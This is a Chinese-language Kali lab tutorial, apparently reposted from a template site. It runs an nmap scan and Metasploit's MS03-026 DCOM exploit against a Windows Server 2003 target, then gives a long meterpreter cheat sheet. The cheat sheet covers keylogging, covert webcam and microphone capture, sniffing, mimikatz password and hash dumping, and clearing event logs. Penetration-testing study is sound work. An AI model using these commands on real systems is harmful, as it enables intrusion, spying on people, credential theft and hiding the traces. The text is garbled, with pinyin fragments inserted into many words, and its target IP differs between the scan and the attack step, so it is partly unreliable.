信息收集
靶機的IP地址為:192.168.173.136
利用nmap工具掃描其開放端口、系統(tǒng)等
整理一下目標(biāo)系統(tǒng)的相關(guān)信息
系統(tǒng)版本:Windows server 2003
開放的端口及服務(wù):
21/tcp ftp
135/tcp msrpc
139/tcp netbios-ssn
445/tcp microsoft-ds
777/tcp multiling-http
1025/tcp NFS-or-IIS
1026/tcp LSA-or-nterm
1029/tcp ms-lsa
1030/tcp iad1
6002/tcp X11:2
7001/tcp afs3-callback
7002/tcp afs3-prserver
8099/tcp 未知服務(wù)
漏洞分析
從掃描出的端口發(fā)現(xiàn),目標(biāo)主機開啟了135端口,服務(wù)為msrpc(遠程過程調(diào)用服務(wù)),即Windows的RPC服務(wù)。
?針對這個服務(wù),我們就可以嘗試去利用一下。
漏洞利用
kali機打開Metaspolit:
root@kali:~# msfconsole
查找所有跟Windows RPC相關(guān)的漏洞攻擊:
msf5 > search dcom
使用MS-03-026 進行攻擊:
msf5 > use exploit/windows/dcerpc/ms03_026_dcom
為了實施攻擊,查看漏洞攻擊的選項和條件:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options
知道攻擊所需要的條件,接下來進行設(shè)置,只需要設(shè)置我們攻擊的目標(biāo)主機即可:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > set RHOSTS 192.168.174.136
RHOSTS => 192.168.174.136
設(shè)置好攻擊條件之后,接下來就進行攻擊:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit
執(zhí)行攻擊命令之后,我們獲取到了目標(biāo)主機的shell權(quán)限,現(xiàn)在,可以執(zhí)行命令查看目標(biāo)主機的一些東西,比如網(wǎng)絡(luò)配置信息:文章來源:http://www.zghlxwxcb.cn/news/detail-488585.html
meterpreter > ipconfig
如需進一步攻擊利用,可配合其他命令進一步操作。文章來源地址http://www.zghlxwxcb.cn/news/detail-488585.html
meterpreter下相關(guān)命令
基本系統(tǒng)命令
——————————
shell 進入目標(biāo)主機cmd shell
reboot 重啟目標(biāo)主機
shutdown 關(guān)閉目標(biāo)主機
sysinfo 查看目標(biāo)主機系統(tǒng)信息
background 將當(dāng)前會話放置后臺
info 查看已有信息模塊
run 執(zhí)行已有的模塊,輸入run后按tab鍵補全,會列出已有的腳本
clearav 清除windows中的應(yīng)用程序日志、系統(tǒng)日志、安全日志
ipconfig 查看網(wǎng)絡(luò)配置信息
netstat 查看網(wǎng)絡(luò)連接信息
getproxy 查看代理信息
route 查看路由
arp 查看arp信息
進程列表:
——————————
getuid 獲取系統(tǒng)ID以及計算機名稱
getpid 獲取當(dāng)前進程標(biāo)識符
kill 結(jié)束進程
ps 列出正在運行中的進程
鼠標(biāo)/鍵盤操作
——————————
keyscan_start 開啟按鍵記錄會話
keyscan_stop 終止按鍵記錄會話
keyscan_dump 轉(zhuǎn)儲從目標(biāo)主機捕獲到的按鍵記錄
uictl enable mouse 啟用鼠標(biāo)
uictl disable mouse 禁用鼠標(biāo)
uictl enable keyboard 啟用鍵盤
uictl disable keyboard 禁用鍵盤
會話
——————————
enumdesktops 列舉所有可訪問到的桌面和工作站
getdesktop 獲取當(dāng)前Meterpreter桌面
setdesktop 變更Meterpreter當(dāng)前桌面
嗅探功能
——————————
use sniffer 加載嗅探功能
sniffer_interfaces 查看網(wǎng)卡
sniffer_start 開始對網(wǎng)卡執(zhí)行嗅探
sniffer_stats 查看狀態(tài)
sniffer_stop 停止對網(wǎng)卡的嗅探
sniffer_dump 將捕獲到的目標(biāo)主機上的數(shù)據(jù)轉(zhuǎn)儲到本地
攝像頭命令
——————————
webcam_list 列舉系統(tǒng)所有的攝像頭
webcam_snap 使用目標(biāo)主機攝像頭拍照
record_mic 從主機的默認麥克風(fēng)中記錄環(huán)境聲音
webcam_stream 通過攝像頭開啟視頻
遠程桌面/截屏
——————————
enumdesktops 查看可用的桌面
getdesktop 獲取當(dāng)前meterpreter 關(guān)聯(lián)的桌面
set_desktop 設(shè)置meterpreter關(guān)聯(lián)的桌面 -h查看幫助
screenshot 截屏
use espia 或者使用espia模塊截屏 然后輸入screengrab
run vnc 使用vnc遠程桌面連接
抓取密碼
——————————
load mimikatz 查看幫助
wdigest 獲取Wdigest密碼
mimikatz_command -f samdump::hashes 執(zhí)行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords
到了這里,關(guān)于網(wǎng)絡(luò)安全kali web安全 Kali之msf簡單的漏洞利用的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!